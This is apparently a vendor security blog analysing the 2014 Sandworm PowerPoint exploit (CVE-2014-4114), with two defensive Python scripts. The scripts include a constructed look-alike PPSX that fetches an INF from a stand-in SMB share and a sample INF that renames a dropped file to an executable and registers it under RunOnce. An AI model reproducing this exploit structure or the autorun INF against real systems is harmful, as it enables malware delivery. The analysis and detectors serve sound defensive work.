Prior to the release of Microsoft’s monthly Patch Tuesday updates, iSight reported a new zero-day exploit for a Windows vulnerability covered by CVE-2014-4114. The vulnerability affects desktop and server versions of Windows from Vista and Server 2008 up to the current versions. It is believed to have been used in cyber attacks against NATO by a Russian cyber espionage group.
Based on our analysis, the vulnerability exists in PACKAGER.DLL, which is part of Windows Object Linking and Embedding (OLE). Using a crafted PowerPoint document, an .INF file in an embedded OLE object can be copied from a remote SMB share and installed on the system. Attackers can exploit this logic defect to execute other malware, downloaded by the same means.
The severity of the vulnerability is highly critical because it is fairly simple to exploit. Since it is a logic defect, attackers do not need to write shellcode or build a Return Oriented Programming (ROP) chain, the usual method of bypassing DEP. DEP prevents the execution of code (including malicious shellcode) from non-executable regions of memory. If attackers know the document format, they can craft a PowerPoint exploit directly. Furthermore, since the exploit involves no heap spray, ROP, or shellcode, most heuristic detection methods would have difficulty detecting it.
The original logic includes two potentially risky behaviors that happen without the user’s knowledge or consent, and which should have been carefully designed:
- Copy a file from a remote shared folder
- Install the downloaded .INF file
We analyzed the PPSX sample (MD5 hash: 330e8d23ab82e8a0ca6d166755408eb1) to investigate how this happens. We unzip the .PPSX file to see the content files of this PowerPoint exploit, as seen below:
Figure 1. Folder structure of PPSX file
The following is the content of oleObject1.bin and oleObject2.bin. It indicates that the OLE objects reside in a remote shared folder.
Figures 2-3. Content of oleObject1.bin and oleObject2.bin
In slide1.xml, we can see that it refers to two Packager Shell Objects, “rId4” and “rId5.”
Figure 4. Content of slide1.xml (part 1)
In slide1.xml.rels, “rId4” and “rId5” are defined as the two OLE objects above.
Figure 5. Content of slide1.xml.rels
When slide1 is opened, packager.dll copies the files “slide1.gif” and “slides.inf” to the local system. slide1.xml also describes two OLE verb actions, “-3” and “3”, which are invoked when the two OLE objects are loaded. This routine is handled by the packager!CPackage::DoVerb() function.
Figure 6. Content of slide1.xml (part 2)
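The structure walked through above (slide XML, its .rels part, the oleObject*.bin embeddings holding UNC paths, and the verbs fired from the slide) can be triaged automatically. The following script is an added example written for this post, not Trend Micro’s tooling and not code from the sample. It builds a constructed look-alike PPSX in memory (the share address 192.0.2.10 is a documentation address standing in for the attacker’s server), then opens it as a zip, follows each slide’s oleObject relationships, scans the embedded Packager data for ANSI UNC paths, and collects the OLE verbs. The markup it looks for, `<p:cmd type="verb" cmd="N">` in the slide’s timing tree, is an assumption about how the values -3 and 3 shown above are encoded.

```python
"""Triage an OOXML presentation (.ppsx/.pptx) for the CVE-2014-4114 pattern:
Packager OLE objects whose payload path points at a remote SMB share, plus
OLE verbs fired automatically from the slide's timing tree."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS_P = "http://schemas.openxmlformats.org/presentationml/2006/main"
NS_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
NS_REL = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = NS_R + "/oleObject"

# ANSI UNC path (\\host\share\file) as stored in a Packager (Ole10Native) stream.
UNC_RE = re.compile(rb"\\\\[A-Za-z0-9._-]+\\[^\x00\"<>|\r\n]+")
# Extensions the Packager can hand straight to an installer or launcher.
RISKY_EXT = (".inf", ".exe", ".scr", ".com", ".bat", ".cmd", ".vbs", ".js")


def _slide_rels(zf, slide):
    """Map rId -> (Type, Target) from the slide's _rels/slideN.xml.rels part."""
    rels_part = slide.replace("ppt/slides/", "ppt/slides/_rels/") + ".rels"
    if rels_part not in zf.namelist():
        return {}
    root = ET.fromstring(zf.read(rels_part))
    return {r.get("Id"): (r.get("Type"), r.get("Target"))
            for r in root.iter("{%s}Relationship" % NS_REL)}


def _resolve(slide, target):
    """Resolve a relative Target (e.g. ../embeddings/x.bin) to a zip entry name."""
    out = []
    for seg in (slide.rsplit("/", 1)[0] + "/" + target).split("/"):
        if seg == "..":
            out.pop()
        elif seg and seg != ".":
            out.append(seg)
    return "/".join(out)


def triage_ppsx(data):
    """Return one finding per OLE object referenced from any slide."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        slides = sorted(n for n in zf.namelist()
                        if re.fullmatch(r"ppt/slides/slide\d+\.xml", n))
        for slide in slides:
            rels = _slide_rels(zf, slide)
            root = ET.fromstring(zf.read(slide))
            # Assumption: auto-fired OLE verbs appear as <p:cmd type="verb" cmd="N">.
            verbs = [c.get("cmd") for c in root.iter("{%s}cmd" % NS_P)
                     if c.get("type") == "verb"]
            for obj in root.iter("{%s}oleObj" % NS_P):
                rid = obj.get("{%s}id" % NS_R)
                rtype, target = rels.get(rid, (None, None))
                if rtype != OLE_REL_TYPE:
                    continue
                part = _resolve(slide, target)
                blob = zf.read(part) if part in zf.namelist() else b""
                unc = [m.decode("latin-1") for m in UNC_RE.findall(blob)]
                findings.append({
                    "slide": slide, "rid": rid, "progId": obj.get("progId"),
                    "part": part, "unc_paths": unc, "verbs": verbs,
                    "risky_ext": any(u.lower().endswith(RISKY_EXT) for u in unc),
                })
    return findings


def is_suspicious(findings):
    """Packager object fetched over SMB plus an automatically fired OLE verb."""
    return any(f["progId"] == "Package" and f["unc_paths"] and f["verbs"]
               for f in findings)


def build_sample(remote=True):
    """Constructed look-alike of the analyzed PPSX layout (not the real sample).
    192.0.2.10 is a documentation address standing in for the attacker's share."""
    host = "\\\\192.0.2.10\\public\\" if remote else "C:\\Users\\demo\\"
    slide = f'''<p:sld xmlns:p="{NS_P}" xmlns:r="{NS_R}"><p:cSld><p:spTree>
<p:graphicFrame><p:oleObj r:id="rId4" progId="Package"/></p:graphicFrame>
<p:graphicFrame><p:oleObj r:id="rId5" progId="Package"/></p:graphicFrame>
</p:spTree></p:cSld><p:timing><p:cmd type="verb" cmd="-3"/><p:cmd type="verb" cmd="3"/>
</p:timing></p:sld>'''
    rels = f'''<Relationships xmlns="{NS_REL}">
<Relationship Id="rId4" Type="{OLE_REL_TYPE}" Target="../embeddings/oleObject1.bin"/>
<Relationship Id="rId5" Type="{OLE_REL_TYPE}" Target="../embeddings/oleObject2.bin"/>
</Relationships>'''
    # Packager stream bodies reduced to their ANSI label and path strings.
    ole1 = b"\x02\x00slide1.gif\x00" + (host + "slide1.gif").encode() + b"\x00"
    ole2 = b"\x02\x00slides.inf\x00" + (host + "slides.inf").encode() + b"\x00"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("ppt/slides/slide1.xml", slide)
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", rels)
        zf.writestr("ppt/embeddings/oleObject1.bin", ole1)
        zf.writestr("ppt/embeddings/oleObject2.bin", ole2)
    return buf.getvalue()


if __name__ == "__main__":
    for f in triage_ppsx(build_sample()):
        print(f["rid"], f["progId"], f["unc_paths"], f["verbs"], f["risky_ext"])
```

Run against a real document, pass the file’s bytes to `triage_ppsx()`; the constructed sample exists only so the script runs offline. The UNC scan is a byte-level heuristic over the embedding: real oleObject*.bin parts are CFBF containers, so for production use parse the `\x01Ole10Native` stream with a proper OLE parser (for example the `olefile` module) before scanning it, and treat a `Package` object with a remote path plus any auto-fired verb as worth quarantining even when the extension is not in `RISKY_EXT`.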
For slide1.gif the verb parameter is “-3”, and the function does nothing. However, for “slides.inf” the verb parameter is “3”, which installs the .INF file. The screenshot below shows the call stack when InfDefaultInstall.exe is executed:
Figure 7. Call stack of INF installation
The .INF then renames slide1.gif to slide1.gif.exe and adds a RunOnce registry value for it, so that the Trojan is executed automatically on the next system boot.
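The two actions the .INF performs, a RenFiles rename of the dropped file to an executable and an AddReg entry under RunOnce, are the kind of thing a responder wants to spot in any INF pulled from a share or an Office document. The script below is an added example written for this post; it is not the actual slides.inf and not Trend Micro’s code. The sample INF it carries is constructed to reproduce only the behaviour described above (section names such as RxRename and RxStart are made up), and the analyzer is a minimal reader that follows the AddReg= and RenFiles= directives of the install section.

```python
"""Static check of a Windows .INF for the two actions the analyzed slides.inf
performs: renaming a dropped file to an executable and registering it under
RunOnce so it starts at next boot."""
import re

AUTORUN_KEY = re.compile(r"\\CurrentVersion\\(Run|RunOnce)$", re.I)
EXEC_EXT = (".exe", ".scr", ".com", ".bat", ".cmd", ".dll")


def parse_inf(text):
    """Minimal INF reader: {section name: [raw entry lines]}; ';' starts a comment."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip()
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def _fields(entry):
    return [f.strip().strip('"') for f in entry.split(",")]


def analyze_inf(text, install_section="DefaultInstall"):
    """Follow AddReg= and RenFiles= directives of the install section and
    return (kind, subject, detail) tuples for the risky ones."""
    sections = parse_inf(text)
    findings = []
    for entry in sections.get(install_section, []):
        directive, _, value = entry.partition("=")
        directive = directive.strip().lower()
        for sec in (s.strip() for s in value.split(",") if s.strip()):
            for item in sections.get(sec, []):
                f = _fields(item)
                # AddReg entry: reg-root,subkey,value-name,flags,value
                if directive == "addreg" and len(f) >= 2 and AUTORUN_KEY.search(f[1]):
                    findings.append(("autorun", f[0] + "\\" + f[1],
                                     f[4] if len(f) > 4 else ""))
                # RenFiles entry: new-name,old-name
                elif directive == "renfiles" and len(f) >= 2 \
                        and f[0].lower().endswith(EXEC_EXT):
                    findings.append(("rename_to_executable", f[1], f[0]))
    return findings


# Constructed INF reproducing the behaviour described above; not the real slides.inf.
SAMPLE_INF = r"""
[Version]
Signature="$CHICAGO$"

[DefaultInstall]
RenFiles=RxRename
AddReg=RxStart

[DestinationDirs]
RxRename=1

[RxRename]
slide1.gif.exe,slide1.gif

[RxStart]
HKLM,Software\Microsoft\Windows\CurrentVersion\RunOnce,Install,,"%1%\slide1.gif.exe"
"""

# Constructed benign INF for comparison: copies a file, touches no autorun key.
BENIGN_INF = r"""
[Version]
Signature="$CHICAGO$"

[DefaultInstall]
CopyFiles=Files
AddReg=Settings

[Files]
readme.txt

[Settings]
HKLM,Software\Example\Tool,Installed,0x10001,1
"""

if __name__ == "__main__":
    for finding in analyze_inf(SAMPLE_INF):
        print(*finding)
```

The reader deliberately does not use `configparser`, because INF sections hold keyless, comma-separated entries and registry paths that a key/value parser would mangle. It is a triage heuristic: real INFs may split installation across decorated sections (DefaultInstall.NT, DefaultInstall.NTamd64), substitute `%name%` tokens from a [Strings] section, and carry `;` inside quoted values, so check those by hand when the automated pass comes back empty on a file you already distrust.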
We detect the exploit as TROJ_MDLOAD.PGTY; successful exploitation leads to the download of INF_BLACKEN.A, which in turn downloads and executes the backdoor we detect as BKDR_BLACKEN.A.
Because this vulnerability is not arduous to exploit, attackers may abuse it to deliver new malware payloads. Trend Micro secures users from this threat by detecting both the exploit and the malware payload via its Smart Protection Network. Trend Micro Deep Security and OfficeScan with the Intrusion Defense Firewall (IDF) plugin protect user systems from threats that may leverage this vulnerability via the following DPI rules:
- 1006290 – Microsoft Windows OLE Remote Code Execution Vulnerability (CVE-2014-4114)
- 1006291 – Microsoft Windows OLE Remote Code Execution Vulnerability (CVE-2014-4114) – 1
Users are strongly advised to patch their systems once Microsoft releases its security update for this vulnerability. In addition, users and employees should not open PowerPoint files from unknown sources, as this may lead to malware infection.
Update as of October 15, 2014, 11:30 P.M.:
Microsoft has included the patch for the Sandworm vulnerability in its October 2014 Patch Tuesday.
Update as of October 16, 2014, 5:45 P.M.:
The Sandworm vulnerability has been linked to attacks against specific SCADA systems. Read more about this in our post titled Sandworm to Blacken: The SCADA Connection.
With additional analysis from Kai Yu